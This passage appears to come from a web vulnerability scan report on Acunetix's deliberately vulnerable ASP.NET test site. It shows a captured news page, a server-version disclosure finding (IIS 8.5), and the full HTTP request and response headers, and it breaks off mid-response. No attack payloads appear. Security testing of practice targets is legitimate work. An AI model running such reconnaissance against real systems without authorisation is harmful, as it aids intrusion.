CAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:46 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFk